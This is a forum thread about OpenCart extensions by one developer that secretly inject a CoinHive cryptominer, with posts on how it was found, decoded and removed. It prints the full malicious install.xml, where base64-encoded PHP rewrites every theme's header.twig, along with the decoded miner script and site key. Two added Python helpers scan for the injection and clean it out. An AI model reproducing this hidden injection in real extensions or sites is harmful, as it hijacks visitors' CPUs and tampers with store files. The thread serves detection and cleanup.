Whilst I suspect most of the extensions provided here are genuine, I happened to download one last week that was not. It added CoinHive malware to my store. I can't find the extension in the market anymore, so it might have been deleted already. It was to add a Paralax Background to my page. CoinHive will allow a hacker to use anyone who views your page to mine cryptocurrency for them. It slows down your customers' viewing experience and will tie up their CPU mining while they have your page open.
It was difficult to find, so I would like to share how I found and removed it. For me the exploits were in /catalog/controller/common/header.php and /catalog/view/theme/yourtemplate/template/common/header.twig.
Opening the page in a browser and viewing the source, you can see the <script> tag just before the </header> end tag, with JavaScript referring to a CoinHive site and function.
Searching for the text in the script tag throughout all the site files yielded little result, as I found out it is base64 encoded.
I found it by base64 encoding the script tag text from the HTML source of the page, selecting about the first 30-ish characters and searching for that. Bingo. Don't copy all the text, as it contains an id unique to the hacker.
I went back to the file I downloaded for the extension and confirmed the malicious script was included in the install.xml.
Well, if you make such a grave Statement, please prove it, by mentioning
the Link to the Extension Page, P L E A S E. And if the Page does
no longer exist, please publish Seller Information and Mod Name as well.
Ernie
My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
Ok sorry, newbie here. I was about to say I couldn't find it as it's been removed, but here is the link to the removed page https://www.opencart.com/index.php?rout ... er=CodeLab . The downloaded file was called ParalaxBackground.zip. If the admins/moderators would like me to send it, please let me know where to send it. It contains versions for both V3 and V2. The xml (V3) contains this code. If you base64_decode the string, it has the CoinHive code.
<search><![CDATA[
$this->load->language('common/header');
]]></search>
<add position="before"><![CDATA[
$modules = base64_decode('PC9oZWFkPg==');
$module = $modules;
$inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==');
$ocplace = $inherit . "\n" . $module;
foreach(glob(DIR_APPLICATION . 'view/theme/*', GLOB_ONLYDIR) as $dif) {
$rlayout = DIR_APPLICATION . 'view/theme/' . basename($dif) . base64_decode('L3RlbXBsYXRlL2NvbW1vbi9oZWFkZXIudHdpZw==');
if (strpos(file_get_contents($rlayout), 'jsworker.start') == false) {
file_put_contents($rlayout, str_replace($module, $ocplace, file_get_contents($rlayout)));
}
}
]]></add>
Decodes to this:
<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>
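The two findings above (a plain-text grep misses the script because it is stored base64-encoded, and the decoded script itself hides the coinhive.com URL inside a second atob() layer) can be turned into a small scanner. This is an added example written for this thread, not code posted by anyone in it; the install.xml fragment it scans is constructed inline with a placeholder site key, and prefix_search_token() reproduces the encode-the-first-30-characters trick, rounding the prefix length down to a multiple of 3 so the encoding stays aligned with the blob.

```python
import base64
import re

# Strings that identify the in-browser miner discussed in this thread.
INDICATORS = ("coinhive", "jsworker", "CoinHive.Anonymous", "atob(")
# base64_decode('...') in PHP/install.xml and atob('...') in JavaScript both
# wrap a single-quoted base64 literal.
B64_CALL = re.compile(r"(?:base64_decode|atob)\(\s*'([A-Za-z0-9+/=]+)'\s*\)")


def decode_layers(text, depth=0, max_depth=4):
    """Peel base64 literals recursively; the miner nests atob() inside
    base64_decode(), so a single decode pass never exposes the coinhive URL."""
    layers = []
    for literal in B64_CALL.findall(text):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("utf-8", "replace")
        except ValueError:  # not real base64, skip it
            continue
        layers.append(decoded)
        if depth < max_depth:
            layers.extend(decode_layers(decoded, depth + 1, max_depth))
    return layers


def scan(text):
    """Return the indicators found in any decoded layer (case-insensitive)."""
    hits = set()
    for layer in decode_layers(text):
        hits.update(i for i in INDICATORS if i.lower() in layer.lower())
    return hits


def prefix_search_token(plain_script, n=30):
    """rebeccag's trick: encode the first n bytes of the plain script and grep
    for that. It works because the blob encodes the script from byte 0, so the
    encoding of a prefix is a prefix of the blob; n is rounded down to a multiple
    of 3 so no '=' padding or partial 6-bit group spoils the match."""
    n -= n % 3
    return base64.b64encode(plain_script[:n].encode()).decode()


def _b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed sample with a placeholder site key, mirroring the thread's install.xml.
INNER_JS = ("<script>document.write(\"<script src='\" + atob('"
            + _b64("https://coinhive.com/lib/coinhive.min.js")
            + "') + \"'><\\/script>\");</script><script>var jsworker = new "
            "CoinHive.Anonymous('PLACEHOLDER_SITE_KEY');jsworker.start();</script>")
SAMPLE_PHP = "$inherit = base64_decode('" + _b64(INNER_JS) + "');"
```

Run scan() over the contents of every .php, .xml and .twig file under the store root; any non-empty result is a file to inspect by hand.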
This developer has 2 other extensions that were updated on Feb 4!!!
The developer CodeLab was registered on 17 Dec 2017.
I think the OpenCart support has to take action on this.
Good catch, rebeccag!!!
Suppliers Module - XML, CSV, XLS Product Feed Import and Update
Rich Snippets | Facebook Open Graph Meta Tags | WebP Images
Well, that's the unfamous Contributor, also adding some bad Code into an image,
found a few days ago. OC already removed some extensions, BUT NOT ALL, because
the LAZY IMAGE LOAD Mod contains this, also coded in BASE64:
<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>
and this one in the FAST REGISTRATION VqMod:
<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>
In one of the extensions, it even exists twice! I reported it to OC a few Minutes ago.
Ernie
---
https://www.opencart.com/index.php?rout ... er=CodeLab
---
Well, since OC resides in one of the Bitcoin Centers of the World,
they may have decided, to use their own Software, to be of Help
in 'Virtual Mining'. It saves a lot of Money on Energy and Hardware.
Ernie
---
Today's Download:
Opencart2x\Parallax-Background-oc2.ocmod.zip
install.xml
still equals:
PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==
which decodes to:
<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>
I got the same problem from this malicious plugin developer, and this is its install.xml.
I have replaced header.php with the original, but the problem still remains. Please advise how I can completely get rid of CoinHive.
<?xml version="1.0" encoding="UTF-8"?>
<modification>
<name>Image Lazy Load</name>
<code>Image Lazy Load</code>
<version>1.0</version>
<author>CodeLab</author>
<link>http://opencart.hu</link>
<!-- script -->
<file path="catalog/view/theme/*/template/common/footer.twig">
<operation>
<search><![CDATA[
</body>
]]></search>
<add position="before"><![CDATA[
<script type="text/javascript">
$(function(){
$("img.img-responsive").lazyload({
effect: "fadeIn",
effectspeed: 600,
threshold: 200
});
});</script>
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/extension/module/featured.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/extension/module/bestseller.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/extension/module/latest.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/extension/module/special.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/product/category.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/product/search.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/product/special.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/module/featured.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/module/bestseller.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- head -->
<file path="catalog/controller/common/header.php">
<operation>
<search><![CDATA[
$this->load->language('common/header');
]]></search>
<add position="before"><![CDATA[
$modules = base64_decode('PC9oZWFkPg==');
$module = $modules;
$inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==');
$ocplace = $inherit . "\n" . $module;
foreach(glob(DIR_APPLICATION . 'view/theme/*', GLOB_ONLYDIR) as $dif) {
$rlayout = DIR_APPLICATION . 'view/theme/' . basename($dif) . base64_decode('L3RlbXBsYXRlL2NvbW1vbi9oZWFkZXIudHdpZw==');
if (strpos(file_get_contents($rlayout), 'jsworker.start') == false) {
file_put_contents($rlayout, str_replace($module, $ocplace, file_get_contents($rlayout)));
}
}
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/module/latest.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/module/special.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- head -->
<file path="catalog/view/theme/*/template/common/header.twig">
<operation>
<search><![CDATA[
</head>
]]></search>
<add position="before"><![CDATA[
<script src="catalog/view/javascript/jquery/lazyload/jquery.lazyload.js" type="text/javascript"></script>
]]></add>
</operation>
</file>
</modification>
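Putting the original header.php back is not enough on its own, because the install.xml above rewrote every theme's header.twig as well (the PHP loops over view/theme/* and re-adds the script whenever 'jsworker.start' is missing), and OpenCart serves OCMOD-patched copies from system/storage/modification until modifications are refreshed. The helper below is an added example for this thread, not code from the thread or from OpenCart: it strips the injected block that the malware placed directly before </head> in each header.twig, reporting first (dry_run=True) and writing only when asked. Uninstall the extension and refresh modifications before running it, then clear the Twig cache; the sample header content is constructed with a placeholder site key.

```python
import re
from pathlib import Path

# The injected PHP in the thread replaces "</head>" in every theme's header.twig
# with "<script>...jsworker.start(...);</script>\n</head>" and re-injects it on
# each request while 'jsworker.start' is missing, so the controller code has to
# go first or the twig files are re-infected on the next page view.
INJECTED = re.compile(
    r"<script>\s*document\.write\(.*?jsworker\.start\(.*?\);\s*</script>\s*(?=</head>)",
    re.DOTALL,
)


def clean_header(html):
    """Return (cleaned_text, blocks_removed) for one header.twig's content."""
    return INJECTED.subn("", html)


def clean_theme_headers(root, dry_run=True):
    """Strip the miner block from every theme's header.twig under root;
    with dry_run=True only report which files are affected."""
    report = {}
    for twig in Path(root).glob("catalog/view/theme/*/template/common/header.twig"):
        text = twig.read_text(encoding="utf-8")
        cleaned, removed = clean_header(text)
        if removed:
            report[str(twig)] = removed
            if not dry_run:
                twig.write_text(cleaned, encoding="utf-8")
    return report


# Constructed header.twig content with a placeholder site key, shaped like the
# injection shown in the thread.
SAMPLE_HEADER = (
    "<head><title>Shop</title>\n"
    "<script> document.write(\"<script type='text/javascript' src='\"+ atob('QUJD') "
    "+ \"'><\\/scr\" + \"ipt>\");</script><script> var jsworker = new "
    "CoinHive.Anonymous('PLACEHOLDER_SITE_KEY',{throttle: 0.2});"
    "jsworker.start(atob('QUJD'));</script>\n</head>"
)
```

Also check system/storage/modification/catalog/view/theme/*/template/common/header.twig and the modification copy of header.php, since those are the files actually served.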